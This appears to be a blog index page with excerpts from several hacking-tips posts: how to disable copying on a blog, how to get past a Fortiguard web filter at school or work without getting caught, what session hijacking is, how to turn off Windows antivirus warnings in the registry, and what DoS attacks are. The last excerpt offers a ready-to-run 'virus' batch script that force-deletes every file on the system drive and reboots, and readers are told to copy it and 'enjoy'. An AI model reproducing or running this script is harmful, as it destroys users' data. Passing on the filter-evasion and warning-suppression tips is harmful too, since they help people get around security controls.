How to Protect your Content from Content Thieves

As we all know that number of bloggers are increasing day by day and so is the number of Content thieves, they tend to copy our original contents while publishing on their blog and websites. Sometime these copycats rank better then the original blog publisher. They easily get high ranks without spending hours of hard work in writing posts, articles. It is indeed unbearable for the blog owner who has spend his previous time in preparing fresh and unique contents and someone easily copy the entire post and publish any where on the web. To make this more sophisticated for copycats who try to copy our post, we must add JavaScript codes which will totally disable copying of text from your blog or website. Or we can copyright website content, but it won’t prevent the content from being copied.

Why Disable Copying of Text in Blog?

There are many “plagiarism” issues, we must take care of our contents and keep eyes on our duplicates contents 24/7 hours. Content copying is one of the biggest problem for Google adsense Publishers. Because Google disables your Adsense Account if they find your articles too many time on different web addresses. The latest Google Panda updates also have strict rules against the copying of copyrighted content, we must take care of our content and check out thrice a day who is copying our posts and articles. So i’ll be providing you JavaScript/HTML codes that will  disable right click on blogger So that no one cay easily grab and copy text from your blogs or websites. Continue reading
Advertisements

Break Fortiguard web filter

Break Fortiguard web filter

Let’s know how to crack fortiguard web filter in 3 easy steps. All 3 are very effective and you can use them at schools, universities and offices. But Keep always one thing in mind don’t get caught. If caught you might get severe punishment for breaking the laws. Here they are..
  • If your school has blocked websites that you want to surf then you can use Web page translator to change the web page from one language to another. You can use two web page translator which are the best.
  1. http://www.babelfish.yahoo.com – This is the best. Just go and type in the address and change the language selection to anything like spanish to english, or german to english. Now as the web page is already in the English, the translation will have no effect on web page and it will open the web page for you in english and you can browse it from there. Continue reading

Session Hijacking in Public Networks

What is Session Hijacking?

Every time you connected to the web application (usually a dynamic web application) you will have a unique ID called “session”, this session will identifies you as a valid user and will always valid until you kill the session (log out process) or the session has expired. Some bad people trying to identifies or guessing the session ID value to gain privileges as a valid user in a web application. Continue reading

Disable Security Center Warning

Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
>>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

In right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.

Enjoy!!!

DOS Attacks

Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

Types:
Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Ping of death type of DoS attack in which the attacker sends a ping request that is larger than 65,536 bytes, which is the maximum size that IP allows. While a ping larger than 65,536 bytes is too large to fit in one packet that can be transmitted, TCP/IP allows a packet to be fragmented, essentially splitting the packet into smaller segments that are eventually reassembled. Attacks took advantage of this flaw by fragmenting packets that when received would total more than the allowed number of bytes and would effectively cause a buffer overload on the operating system at the receiving end, crashing the system. Ping of death attacks are rare today as most operating systems have been fixed to prevent this type of attack from occurring.  

DDOS Attack: A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. This is the result of multiple compromised systems (for example a botnet) flooding the targeted system(s) with traffic. When a server is overloaded with connections, new connections can no longer be accepted.


Peer to Peer Attack Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a “puppet master,” instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim’s website instead. As a result, several thousand computers may aggressively try to connect to a target website. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses.





Virus Scripts Writing

I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .
Open Notepad…..
copy the scripts and enjoy!!!  >>This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file Continue reading